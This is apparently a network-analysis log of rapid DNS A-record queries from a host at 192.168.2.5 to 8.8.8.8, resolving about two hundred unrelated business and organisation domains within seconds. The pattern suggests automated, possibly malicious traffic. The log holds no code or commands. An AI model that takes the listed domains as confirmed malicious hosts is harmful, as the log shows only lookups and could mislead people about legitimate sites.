Mar 22, 2023 05:45:12.908313036 CET	192.168.2.5	8.8.8.8	0xda5	Standard query (0)	iranytu.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.908313036 CET	192.168.2.5	8.8.8.8	0x4ad3	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.911367893 CET	192.168.2.5	8.8.8.8	0xd1db	Standard query (0)	mjrcpas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.913252115 CET	192.168.2.5	8.8.8.8	0x44a9	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.921586990 CET	192.168.2.5	8.8.8.8	0x1093	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.926717997 CET	192.168.2.5	8.8.8.8	0x1cf2	Standard query (0)	106west.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.927094936 CET	192.168.2.5	8.8.8.8	0xb117	Standard query (0)	likangds.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.929708958 CET	192.168.2.5	8.8.8.8	0xcc77	Standard query (0)	ikulani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.932890892 CET	192.168.2.5	8.8.8.8	0x1078	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.932890892 CET	192.168.2.5	8.8.8.8	0x9518	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.932991028 CET	192.168.2.5	8.8.8.8	0x2492	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.940256119 CET	192.168.2.5	8.8.8.8	0x8f9	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.942714930 CET	192.168.2.5	8.8.8.8	0xfbd5	Standard query (0)	oaith.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.942714930 CET	192.168.2.5	8.8.8.8	0x80e4	Standard query (0)	deckoviny.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.954303980 CET	192.168.2.5	8.8.8.8	0x4f0	Standard query (0)	shanks.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.965827942 CET	192.168.2.5	8.8.8.8	0xf253	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.984002113 CET	192.168.2.5	8.8.8.8	0x92d6	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.009732008 CET	192.168.2.5	8.8.8.8	0x3099	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.013025999 CET	192.168.2.5	8.8.8.8	0x29a1	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.106609106 CET	192.168.2.5	8.8.8.8	0x88d1	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.126537085 CET	192.168.2.5	8.8.8.8	0xcbc0	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.133531094 CET	192.168.2.5	8.8.8.8	0x94d9	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.249295950 CET	192.168.2.5	8.8.8.8	0x56df	Standard query (0)	ruzee.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.452265978 CET	192.168.2.5	8.8.8.8	0x6050	Standard query (0)	karila.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.562608004 CET	192.168.2.5	8.8.8.8	0x2a1a	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.680022001 CET	192.168.2.5	8.8.8.8	0xdfc7	Standard query (0)	geecl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.686743021 CET	192.168.2.5	8.8.8.8	0xaf21	Standard query (0)	agulatex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.811669111 CET	192.168.2.5	8.8.8.8	0xc597	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.883124113 CET	192.168.2.5	8.8.8.8	0x6e7e	Standard query (0)	t-mould.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.928904057 CET	192.168.2.5	8.8.8.8	0x5bf6	Standard query (0)	biosolve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.933209896 CET	192.168.2.5	8.8.8.8	0xdf68	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.960875988 CET	192.168.2.5	8.8.8.8	0x7f1e	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:13.996857882 CET	192.168.2.5	8.8.8.8	0x729	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.043180943 CET	192.168.2.5	8.8.8.8	0xeac6	Standard query (0)	camamat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.046837091 CET	192.168.2.5	8.8.8.8	0xae40	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.130619049 CET	192.168.2.5	8.8.8.8	0x9b10	Standard query (0)	zupraha.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.184782028 CET	192.168.2.5	8.8.8.8	0x2ca	Standard query (0)	atb-lit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.185345888 CET	192.168.2.5	8.8.8.8	0x862d	Standard query (0)	okashimo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.187760115 CET	192.168.2.5	8.8.8.8	0xaf77	Standard query (0)	bigzz.by	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.208018064 CET	192.168.2.5	8.8.8.8	0x8f8e	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.269277096 CET	192.168.2.5	8.8.8.8	0xc247	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.275177956 CET	192.168.2.5	8.8.8.8	0x1c6	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.313760996 CET	192.168.2.5	8.8.8.8	0x3e38	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.369755983 CET	192.168.2.5	8.8.8.8	0xac31	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.399143934 CET	192.168.2.5	8.8.8.8	0x3767	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.423993111 CET	192.168.2.5	8.8.8.8	0x9ce6	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.449363947 CET	192.168.2.5	8.8.8.8	0x90fe	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.469028950 CET	192.168.2.5	8.8.8.8	0x1df0	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.477597952 CET	192.168.2.5	8.8.8.8	0x8438	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.577265978 CET	192.168.2.5	8.8.8.8	0xa858	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.600234032 CET	192.168.2.5	8.8.8.8	0x6517	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.680665970 CET	192.168.2.5	8.8.8.8	0x82a4	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.719036102 CET	192.168.2.5	8.8.8.8	0x99e1	Standard query (0)	host.do	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.798968077 CET	192.168.2.5	8.8.8.8	0xf585	Standard query (0)	smitko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.834645033 CET	192.168.2.5	8.8.8.8	0xeb23	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.859230995 CET	192.168.2.5	8.8.8.8	0xc597	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.959515095 CET	192.168.2.5	8.8.8.8	0xa1a1	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:14.992079020 CET	192.168.2.5	8.8.8.8	0x9532	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.047463894 CET	192.168.2.5	8.8.8.8	0x1655	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.054357052 CET	192.168.2.5	8.8.8.8	0xa979	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.059242010 CET	192.168.2.5	8.8.8.8	0x4711	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.064707994 CET	192.168.2.5	8.8.8.8	0xf460	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.084424973 CET	192.168.2.5	8.8.8.8	0xabec	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.093924046 CET	192.168.2.5	8.8.8.8	0x477f	Standard query (0)	ikulani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.097729921 CET	192.168.2.5	8.8.8.8	0x5cc9	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.114367008 CET	192.168.2.5	8.8.8.8	0xc89f	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.199843884 CET	192.168.2.5	8.8.8.8	0x470a	Standard query (0)	gcss.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.217631102 CET	192.168.2.5	8.8.8.8	0x46df	Standard query (0)	yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.238842964 CET	192.168.2.5	8.8.8.8	0xc19e	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.285934925 CET	192.168.2.5	8.8.8.8	0xdc42	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.313077927 CET	192.168.2.5	8.8.8.8	0xbe70	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.339276075 CET	192.168.2.5	8.8.8.8	0x4884	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.377628088 CET	192.168.2.5	8.8.8.8	0x57e3	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.467891932 CET	192.168.2.5	8.8.8.8	0x93da	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.627264023 CET	192.168.2.5	8.8.8.8	0x7fa6	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.651916027 CET	192.168.2.5	8.8.8.8	0xd102	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.677875996 CET	192.168.2.5	8.8.8.8	0xa988	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.707740068 CET	192.168.2.5	8.8.8.8	0xe039	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.733424902 CET	192.168.2.5	8.8.8.8	0x9c57	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.736337900 CET	192.168.2.5	8.8.8.8	0xd00f	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.775916100 CET	192.168.2.5	8.8.8.8	0xcc38	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.799140930 CET	192.168.2.5	8.8.8.8	0xe597	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.817677021 CET	192.168.2.5	8.8.8.8	0x81ef	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.858712912 CET	192.168.2.5	8.8.8.8	0xb496	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.865115881 CET	192.168.2.5	8.8.8.8	0x271a	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:15.912041903 CET	192.168.2.5	8.8.8.8	0xc3b4	Standard query (0)	shztm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.103538036 CET	192.168.2.5	8.8.8.8	0xfba3	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.115839005 CET	192.168.2.5	8.8.8.8	0xe3b4	Standard query (0)	sgk.home.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.137855053 CET	192.168.2.5	8.8.8.8	0xb153	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.170063972 CET	192.168.2.5	8.8.8.8	0x14ed	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.210733891 CET	192.168.2.5	8.8.8.8	0x133e	Standard query (0)	roewer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.219316959 CET	192.168.2.5	8.8.8.8	0xa0b5	Standard query (0)	geecl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.257121086 CET	192.168.2.5	8.8.8.8	0x799a	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.263880968 CET	192.168.2.5	8.8.8.8	0x4294	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.284876108 CET	192.168.2.5	8.8.8.8	0xe77d	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.310645103 CET	192.168.2.5	8.8.8.8	0x6dd0	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.385494947 CET	192.168.2.5	8.8.8.8	0x323	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.412858009 CET	192.168.2.5	8.8.8.8	0x292d	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.501882076 CET	192.168.2.5	8.8.8.8	0x3111	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.537004948 CET	192.168.2.5	8.8.8.8	0xa3b8	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.556700945 CET	192.168.2.5	8.8.8.8	0x370e	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.630070925 CET	192.168.2.5	8.8.8.8	0xcce2	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.656383038 CET	192.168.2.5	8.8.8.8	0xad11	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.683291912 CET	192.168.2.5	8.8.8.8	0x3447	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.729510069 CET	192.168.2.5	8.8.8.8	0xe053	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.730278969 CET	192.168.2.5	8.8.8.8	0x3178	Standard query (0)	invictus.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.826796055 CET	192.168.2.5	8.8.8.8	0x3190	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.870126963 CET	192.168.2.5	8.8.8.8	0x123b	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.875816107 CET	192.168.2.5	8.8.8.8	0xc597	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.877396107 CET	192.168.2.5	8.8.8.8	0x4631	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.968146086 CET	192.168.2.5	8.8.8.8	0xd3f9	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:16.972182989 CET	192.168.2.5	8.8.8.8	0x4922	Standard query (0)	biosolve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.057796001 CET	192.168.2.5	8.8.8.8	0xb0f4	Standard query (0)	johnlyon.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.103410006 CET	192.168.2.5	8.8.8.8	0xb5c7	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.211414099 CET	192.168.2.5	8.8.8.8	0xdc3b	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.269639015 CET	192.168.2.5	8.8.8.8	0xccdb	Standard query (0)	kumaden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.317806959 CET	192.168.2.5	8.8.8.8	0x5f6a	Standard query (0)	nme.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.380006075 CET	192.168.2.5	8.8.8.8	0xc2cd	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.381515980 CET	192.168.2.5	8.8.8.8	0xeeb1	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.429800034 CET	192.168.2.5	8.8.8.8	0x4fd6	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.478615046 CET	192.168.2.5	8.8.8.8	0xb66b	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.507416964 CET	192.168.2.5	8.8.8.8	0x4432	Standard query (0)	e-kami.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.642028093 CET	192.168.2.5	8.8.8.8	0x7709	Standard query (0)	mondopp.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.644730091 CET	192.168.2.5	8.8.8.8	0xc0f8	Standard query (0)	cutchie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.658181906 CET	192.168.2.5	8.8.8.8	0xd97b	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.680445910 CET	192.168.2.5	8.8.8.8	0xbdea	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.694313049 CET	192.168.2.5	8.8.8.8	0xa011	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.811330080 CET	192.168.2.5	8.8.8.8	0xe5da	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.845354080 CET	192.168.2.5	8.8.8.8	0x92dc	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.878115892 CET	192.168.2.5	8.8.8.8	0x90d2	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.909857988 CET	192.168.2.5	8.8.8.8	0x82b1	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:17.925477028 CET	192.168.2.5	8.8.8.8	0x6fc	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.085679054 CET	192.168.2.5	8.8.8.8	0xf19d	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.116669893 CET	192.168.2.5	8.8.8.8	0x7a20	Standard query (0)	alexpope.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.140938997 CET	192.168.2.5	8.8.8.8	0x3b0e	Standard query (0)	esmoke.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.147183895 CET	192.168.2.5	8.8.8.8	0x57cb	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.151164055 CET	192.168.2.5	8.8.8.8	0xa2ef	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.156964064 CET	192.168.2.5	8.8.8.8	0x8228	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.337191105 CET	192.168.2.5	8.8.8.8	0xbb74	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.633387089 CET	192.168.2.5	8.8.8.8	0x681e	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.656163931 CET	192.168.2.5	8.8.8.8	0xccac	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.680712938 CET	192.168.2.5	8.8.8.8	0xe133	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.712234020 CET	192.168.2.5	8.8.8.8	0xa974	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.743437052 CET	192.168.2.5	8.8.8.8	0xb745	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.765585899 CET	192.168.2.5	8.8.8.8	0xb7e0	Standard query (0)	tcpoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.771429062 CET	192.168.2.5	8.8.8.8	0xc430	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.827584982 CET	192.168.2.5	8.8.8.8	0x884a	Standard query (0)	notis.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.827888966 CET	192.168.2.5	8.8.8.8	0xef9e	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.843166113 CET	192.168.2.5	8.8.8.8	0x39a2	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.857593060 CET	192.168.2.5	8.8.8.8	0x92dc	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.874174118 CET	192.168.2.5	8.8.8.8	0x5d47	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.874174118 CET	192.168.2.5	8.8.8.8	0x51c5	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.886831045 CET	192.168.2.5	8.8.8.8	0xcd2	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:18.927541018 CET	192.168.2.5	8.8.8.8	0xf037	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.014863014 CET	192.168.2.5	8.8.8.8	0xe2ce	Standard query (0)	epc.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.126393080 CET	192.168.2.5	8.8.8.8	0xe18c	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.129017115 CET	192.168.2.5	8.8.8.8	0xb68d	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.139580965 CET	192.168.2.5	8.8.8.8	0x327a	Standard query (0)	akdeniz.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.158296108 CET	192.168.2.5	8.8.8.8	0xa1a4	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.265273094 CET	192.168.2.5	8.8.8.8	0xbab0	Standard query (0)	webavant.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.285294056 CET	192.168.2.5	8.8.8.8	0x82e1	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.312356949 CET	192.168.2.5	8.8.8.8	0xf354	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.335680962 CET	192.168.2.5	8.8.8.8	0x31ad	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.378911018 CET	192.168.2.5	8.8.8.8	0xed5b	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.380860090 CET	192.168.2.5	8.8.8.8	0x882	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.411604881 CET	192.168.2.5	8.8.8.8	0x9086	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.412395000 CET	192.168.2.5	8.8.8.8	0x360a	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.426079035 CET	192.168.2.5	8.8.8.8	0xddeb	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.436698914 CET	192.168.2.5	8.8.8.8	0x1fae	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.438208103 CET	192.168.2.5	8.8.8.8	0x35f6	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.452706099 CET	192.168.2.5	8.8.8.8	0xcaed	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.476974010 CET	192.168.2.5	8.8.8.8	0x2a83	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.537415028 CET	192.168.2.5	8.8.8.8	0x69cd	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.565937042 CET	192.168.2.5	8.8.8.8	0x882b	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.662168980 CET	192.168.2.5	8.8.8.8	0xca33	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.674215078 CET	192.168.2.5	8.8.8.8	0x54ed	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.693391085 CET	192.168.2.5	8.8.8.8	0xc17d	Standard query (0)	mcseurope.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:19.857476950 CET	192.168.2.5	8.8.8.8	0x92dc	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.125340939 CET	192.168.2.5	8.8.8.8	0x2940	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.135508060 CET	192.168.2.5	8.8.8.8	0xa34f	Standard query (0)	kairel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.219872952 CET	192.168.2.5	8.8.8.8	0xb2b	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.266411066 CET	192.168.2.5	8.8.8.8	0x5186	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.266608000 CET	192.168.2.5	8.8.8.8	0x27a9	Standard query (0)	invictus.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.280937910 CET	192.168.2.5	8.8.8.8	0xae9b	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.400825977 CET	192.168.2.5	8.8.8.8	0x4e8f	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.415975094 CET	192.168.2.5	8.8.8.8	0x454	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.449035883 CET	192.168.2.5	8.8.8.8	0x2e38	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.470252991 CET	192.168.2.5	8.8.8.8	0x1a20	Standard query (0)	bd-style.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.475735903 CET	192.168.2.5	8.8.8.8	0x2055	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.757277012 CET	192.168.2.5	8.8.8.8	0xed71	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:20.943051100 CET	192.168.2.5	8.8.8.8	0x6aa7	Standard query (0)	shiner.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.015469074 CET	192.168.2.5	8.8.8.8	0x2ea1	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
